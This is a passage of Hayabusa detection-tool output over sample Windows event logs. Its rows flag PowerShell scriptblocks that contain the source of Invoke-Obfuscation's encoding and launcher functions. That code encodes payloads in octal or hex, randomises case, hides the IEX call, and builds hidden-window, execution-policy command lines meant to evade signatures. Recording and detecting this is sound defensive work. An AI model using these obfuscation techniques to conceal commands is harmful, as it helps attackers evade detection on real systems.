$RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Hex values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script w",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.258 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.258 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ithout dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.262 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = 